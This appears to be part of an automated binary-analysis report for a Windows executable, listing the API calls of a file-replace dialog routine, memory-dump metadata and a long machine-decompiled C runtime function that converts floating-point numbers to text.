                                                                                                                0x00ed0bfd
                                                                                                                0x00ed0bfe
                                                                                                                0x00ed0c00
                                                                                                                0x00ed0c24
                                                                                                                0x00ed0c24
                                                                                                                0x00ed0c26
                                                                                                                0x00ed0c26
                                                                                                                0x00ed0c27
                                                                                                                0x00ed0c31
                                                                                                                0x00ed0c39
                                                                                                                0x00ed0c3c
                                                                                                                0x00ed0c3c
                                                                                                                0x00ed0c44
                                                                                                                0x00000000
                                                                                                                0x00ed0c44
                                                                                                                0x00ed0c02
                                                                                                                0x00ed0c05
                                                                                                                0x00ed0c59
                                                                                                                0x00000000
                                                                                                                0x00ed0c59
                                                                                                                0x00ed0c07
                                                                                                                0x00ed0c0a
                                                                                                                0x00ed0c56
                                                                                                                0x00000000
                                                                                                                0x00ed0c56
                                                                                                                0x00ed0c0c
                                                                                                                0x00ed0c0f
                                                                                                                0x00ed0c50
                                                                                                                0x00000000
                                                                                                                0x00ed0c50
                                                                                                                0x00ed0c11
                                                                                                                0x00ed0c14
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0c16
                                                                                                                0x00ed0c19
                                                                                                                0x00ed0c4c
                                                                                                                0x00000000
                                                                                                                0x00ed0c4c
                                                                                                                0x00ed0c1e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0c1e
                                                                                                                0x00ed0bdf
                                                                                                                0x00ed0be1
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EC11DA: GetDlgItem.USER32(00000000,00003021), ref: 00EC121E
                                                                                                                  • Part of subcall function 00EC11DA: SetWindowTextW.USER32(00000000,00EE7544), ref: 00EC1234
                                                                                                                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00ED0C31
                                                                                                                • GetDlgItem.USER32(?,0000006C), ref: 00ED0C60
                                                                                                                • SetFocus.USER32(00000000), ref: 00ED0C67
                                                                                                                • SetDlgItemTextW.USER32(?,00000065,?), ref: 00ED0CA1
                                                                                                                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00ED0CD8
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00ED0CEE
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ED0D0C
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00ED0D1C
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00ED0D38
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00ED0D54
                                                                                                                • _swprintf.LIBCMT ref: 00ED0D84
                                                                                                                  • Part of subcall function 00EC37E6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00EC37F9
                                                                                                                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00ED0D97
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00ED0D9E
                                                                                                                • _swprintf.LIBCMT ref: 00ED0DF7
                                                                                                                • SetDlgItemTextW.USER32(?,00000068,?), ref: 00ED0E0A
                                                                                                                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00ED0E27
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00ED0E47
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00ED0E57
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00ED0E71
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00ED0E89
                                                                                                                • _swprintf.LIBCMT ref: 00ED0EB5
                                                                                                                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00ED0EC8
                                                                                                                • _swprintf.LIBCMT ref: 00ED0F1C
                                                                                                                • SetDlgItemTextW.USER32(?,00000069,?), ref: 00ED0F2F
                                                                                                                  • Part of subcall function 00ECF8F6: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00ECF91C
                                                                                                                  • Part of subcall function 00ECF8F6: GetNumberFormatW.KERNEL32 ref: 00ECF96B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                • String ID: Ht>*$%s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                • API String ID: 2581152039-2598852107
                                                                                                                • Opcode ID: 9aafcf70d33341b1daf50f9c07cae7682e6daff72f215ef93d98f19d908a9f3c
                                                                                                                • Instruction ID: df594ea7ff408ba5be328210986e9232b23434aaf7d0ca0723ee3c9de25a58c7
                                                                                                                • Opcode Fuzzy Hash: 9aafcf70d33341b1daf50f9c07cae7682e6daff72f215ef93d98f19d908a9f3c
                                                                                                                • Instruction Fuzzy Hash: CD91A572248348BFD331DBA0CD49FEB77ECEB49704F04191AF689E6181D671AA069762
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE209E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00EE209E(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				char _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1128;
				void* _t1132;
				void* _t1133;
				unsigned int _t1134;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				intOrPtr* _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				void* _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int* _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				intOrPtr* _t1178;
				intOrPtr* _t1179;
				signed int _t1181;
				signed int _t1183;
				signed int _t1186;
				signed int _t1192;
				signed int _t1196;
				signed int _t1197;
				intOrPtr _t1199;
				intOrPtr _t1200;
				signed int _t1205;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1229;
				signed int _t1231;
				signed int _t1233;
				signed int _t1235;
				signed int* _t1237;
				signed int* _t1241;
				signed int _t1250;

				_t725 =  *0xef1558; // 0xf529bb33
				_v8 = _t725 ^ _t1235;
				_t1016 = _a20;
				_t1145 = _a16;
				_v1924 = _t1145;
				_v1920 = _t1016;
				E00EE1BC6( &_v1944, __eflags);
				_t1196 = _a8;
				_t730 = 0x2d;
				if((_t1196 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1145 = _t730;
				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
				_t1146 = _a4;
				if((_t1196 & 0x7ff00000) != 0) {
					L5:
					_t735 = E00EDE1C4( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1146;
									_a8 = _t1196 & 0x7fffffff;
									_t1250 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1150 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1150 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1101 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1101 = 1;
									}
									_t1151 = _t1150 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1101;
									_t1037 = _t1036 & 0x000007ff;
									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
									_v1872 = _t1205;
									E00EE3C90(_t1037, _t1250);
									_push(_t1037);
									_push(_t1037);
									 *_t1237 = _t1250;
									_t764 = E00EE6B30(E00EE3DA0(_t1151, _t1205), _t1250);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
									__eflags = _t1151;
									_v464 = _t1151;
									_t1022 = (0 | _t1151 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1205;
									if(_t1205 < 0) {
										__eflags = _t1205 - 0xfffffc02;
										if(_t1205 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1223 = _t1068;
														_t1178 =  &_v468 + _t1068 * 4;
														_v1880 = _t1178;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1178;
															}
															_t210 = _t1223 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1128 = 0;
																__eflags = 0;
															} else {
																_t1128 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t936 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1205 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1154 = 1 - _t1205;
											E00ED4440(_t1154,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1132 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
														goto L101;
													}
													_t1132 = _t1132 + 4;
													__eflags = _t1132 - 8;
													if(_t1132 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1133 = 0;
															__eflags = 0;
														} else {
															_t1133 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1224 = _t1069;
														__eflags = _t939 - _t1133 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1179 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1133 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1224 - _t1022;
															if(_t1224 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1179;
															}
															_t175 = _t1224 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1134 = 0;
																__eflags = 0;
															} else {
																_t1134 =  *(_t1179 - 4);
															}
															_t1179 = _t1179 - 4;
															_t945 = _v1880;
															_t1224 = _t1224 - 1;
															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1224 - 0xffffffff;
															if(_t1224 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1181 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1226 = _t1181 << 2;
														E00ED4440(_t1181,  &_v1396, 0, _t1226);
														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1181 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1227 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1227;
										__eflags = _t1022 - _t1227;
										if(_t1022 != _t1227) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1183 = _t956 >> 5;
											_v1872 = _t1183;
											_v1908 = _t1073 - _t957;
											_t960 = E00EE6B10(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1139 = _t1022 + _t1183;
											__eflags = _v1876 - _t964;
											_v1892 = _t1139;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1139 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
											__eflags = _t1139 - 0x73;
											if(_t1139 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1139 - _t1078;
													if(_t1139 >= _t1078) {
														_t1139 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1139;
													_v1880 = _t974;
													__eflags = _t1139 - 0xffffffff;
													if(_t1139 != 0xffffffff) {
														_t1140 = _v1872;
														_t1229 = _t1139 - _t1140;
														__eflags = _t1229;
														_t1082 =  &_v468 + _t1229 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1140;
															if(_t974 < _t1140) {
																break;
															}
															__eflags = _t1229 - _t1022;
															if(_t1229 >= _t1022) {
																_t1186 = 0;
																__eflags = 0;
															} else {
																_t1186 =  *_t1082;
															}
															__eflags = _t1229 - 1 - _t1022;
															if(_t1229 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1229 = _t1229 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1139 = _v1892;
														_t1183 = _v1872;
														_t1227 = 2;
													}
													__eflags = _t1183;
													if(_t1183 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1183 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1139;
													} else {
														_v472 = _t1139 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1227;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
													goto L53;
												}
												_t1086 = _t1086 + 4;
												__eflags = _t1086 - 8;
												if(_t1086 != 8) {
													continue;
												} else {
													_t985 = _v1872 + 2;
													_t986 = _t985 & 0x0000001f;
													_t1087 = 0x20;
													_t1088 = _t1087 - _t986;
													_v1888 = _t986;
													_t1231 = _t985 >> 5;
													_v1876 = _t1231;
													_v1908 = _t1088;
													_t989 = E00EE6B10(1, _t1088, 0);
													_v1896 = _v1896 & 0x00000000;
													_t990 = _t989 - 1;
													__eflags = _t990;
													asm("bsr ecx, edi");
													_v1884 = _t990;
													_v1912 =  !_t990;
													if(_t990 == 0) {
														_t1089 = 0;
														__eflags = 0;
													} else {
														_t1089 = _t1088 + 1;
													}
													_t992 = 0x20;
													_t993 = _t992 - _t1089;
													_t1142 = _t1231 + 2;
													__eflags = _v1888 - _t993;
													_v1880 = _t1142;
													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
													__eflags = _t1142 - 0x73;
													_v1865 = _t994;
													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
													__eflags = _t1142 - 0x73;
													if(_t1142 != 0x73) {
														L28:
														_t995 = 0;
														__eflags = 0;
													} else {
														__eflags = _t994;
														if(_t994 == 0) {
															goto L28;
														} else {
															_t995 = 1;
														}
													}
													__eflags = _t1090;
													if(_t1090 != 0) {
														L50:
														__eflags = 0;
														_t1025 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1237 =  &(_t1237[4]);
													} else {
														__eflags = _t995;
														if(_t995 != 0) {
															goto L50;
														} else {
															_t1093 = 0x72;
															__eflags = _t1142 - _t1093;
															if(_t1142 >= _t1093) {
																_t1142 = _t1093;
																_v1880 = _t1093;
															}
															_t1094 = _t1142;
															_v1892 = _t1094;
															__eflags = _t1142 - 0xffffffff;
															if(_t1142 != 0xffffffff) {
																_t1143 = _v1876;
																_t1233 = _t1142 - _t1143;
																__eflags = _t1233;
																_t1004 =  &_v468 + _t1233 * 4;
																_v1872 = _t1004;
																while(1) {
																	__eflags = _t1094 - _t1143;
																	if(_t1094 < _t1143) {
																		break;
																	}
																	__eflags = _t1233 - _t1022;
																	if(_t1233 >= _t1022) {
																		_t1192 = 0;
																		__eflags = 0;
																	} else {
																		_t1192 =  *_t1004;
																	}
																	__eflags = _t1233 - 1 - _t1022;
																	if(_t1233 - 1 >= _t1022) {
																		_t1006 = 0;
																		__eflags = 0;
																	} else {
																		_t1006 =  *(_v1872 - 4);
																	}
																	_t1099 = _v1892;
																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
																	_t1094 = _t1099 - 1;
																	_t1233 = _t1233 - 1;
																	_t1004 = _v1872 - 4;
																	_v1892 = _t1094;
																	_v1872 = _t1004;
																	__eflags = _t1094 - 0xffffffff;
																	if(_t1094 != 0xffffffff) {
																		_t1022 = _v472;
																		continue;
																	}
																	break;
																}
																_t1142 = _v1880;
																_t1231 = _v1876;
															}
															__eflags = _t1231;
															if(_t1231 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1231 << 2);
																_t1237 =  &(_t1237[3]);
															}
															__eflags = _v1865;
															_t1025 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1142;
															} else {
																_v472 = _t1142 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t999 = 4;
													__eflags = 1;
													_v1396 = _t999;
													_v1400 = 1;
													_v936 = 1;
													_push(_t999);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1025);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[4]);
									}
									_t782 = _v1904;
									_t1043 = 0xa;
									_v1912 = _t1043;
									__eflags = _t782;
									if(_t782 < 0) {
										_t783 =  ~_t782;
										_t784 = _t783 / _t1043;
										_v1880 = _t784;
										_t1044 = _t783 % _t1043;
										_v1884 = _t1044;
										__eflags = _t784;
										if(_t784 == 0) {
											L249:
											__eflags = _t1044;
											if(_t1044 != 0) {
												_t820 =  *(0xeebadc + _t1044 * 4);
												_v1896 = _t820;
												__eflags = _t820;
												if(_t820 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t820 - 1;
													if(_t820 != 1) {
														_t1055 = _v472;
														__eflags = _t1055;
														if(_t1055 != 0) {
															_t1161 = 0;
															_t1213 = 0;
															__eflags = 0;
															do {
																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
																_t820 = _v1896;
																asm("adc edx, 0x0");
																_t1213 = _t1213 + 1;
																_t1161 = _t1113;
																__eflags = _t1213 - _t1055;
															} while (_t1213 != _t1055);
															__eflags = _t1161;
															if(_t1161 != 0) {
																_t826 = _v472;
																__eflags = _t826 - 0x73;
																if(_t826 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t784 - 0x26;
												if(_t784 > 0x26) {
													_t784 = 0x26;
												}
												_t1056 =  *(0xeeba46 + _t784 * 4) & 0x000000ff;
												_v1872 = _t784;
												_v1400 = ( *(0xeeba46 + _t784 * 4) & 0x000000ff) + ( *(0xeeba47 + _t784 * 4) & 0x000000ff);
												E00ED4440(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
												_t837 = E00ED4C60( &(( &_v1396)[_t1056]), 0xeeb140 + ( *(0xeeba44 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xeeba47 + _t784 * 4) & 0x000000ff) << 2);
												_t1057 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1057;
												__eflags = _t1057 - 1;
												if(_t1057 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1057 - _v472;
														_t1164 =  &_v1396;
														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
														__eflags = _t838;
														if(_t838 != 0) {
															_t1114 =  &_v468;
														} else {
															_t1164 =  &_v468;
															_t1114 =  &_v1396;
														}
														_v1908 = _t1114;
														__eflags = _t838;
														if(_t838 == 0) {
															_t1057 = _v472;
														}
														_v1876 = _t1057;
														__eflags = _t838;
